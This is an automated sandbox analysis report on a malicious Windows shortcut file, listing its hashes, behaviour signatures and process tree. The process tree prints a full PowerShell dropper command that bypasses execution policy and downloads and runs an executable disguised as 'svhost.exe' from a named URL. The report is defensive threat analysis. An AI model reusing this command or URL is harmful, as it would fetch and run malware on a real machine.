Analysis

  • max time kernel
    46s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    02-02-2023 07:08

General

  • Target

    07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk

  • Size

    2KB

  • MD5

    ef7f9739337bc657cd0a63e32e27d0a1

  • SHA1

    bf67555a7272f24ceb57b1c49e4cf37dc17b246f

  • SHA256

    a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c

  • SHA512

    e3d0a14ac1b9165e75e619aa6f76058a4c799bb722abaeafac977c35f31ab10ad8c8a51c7f3828bb896cbf339f971974a4fb26421ba6aea52530ac84b7785ada

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:852
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\Admin\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svhost.exe'
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1020

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/852-54-0x000007FEFB651000-0x000007FEFB653000-memory.dmp
    Filesize

    8KB

  • memory/1020-88-0x0000000000000000-mapping.dmp
  • memory/1020-93-0x000007FEF3C00000-0x000007FEF4623000-memory.dmp
    Filesize

    10.1MB

  • memory/1020-94-0x000007FEF30A0000-0x000007FEF3BFD000-memory.dmp
    Filesize

    11.4MB

  • memory/1020-95-0x0000000002484000-0x0000000002487000-memory.dmp
    Filesize

    12KB

  • memory/1020-96-0x000000000248B000-0x00000000024AA000-memory.dmp
    Filesize

    124KB

  • memory/1020-97-0x0000000002484000-0x0000000002487000-memory.dmp
    Filesize

    12KB

  • memory/1020-98-0x000000000248B000-0x00000000024AA000-memory.dmp
    Filesize

    124KB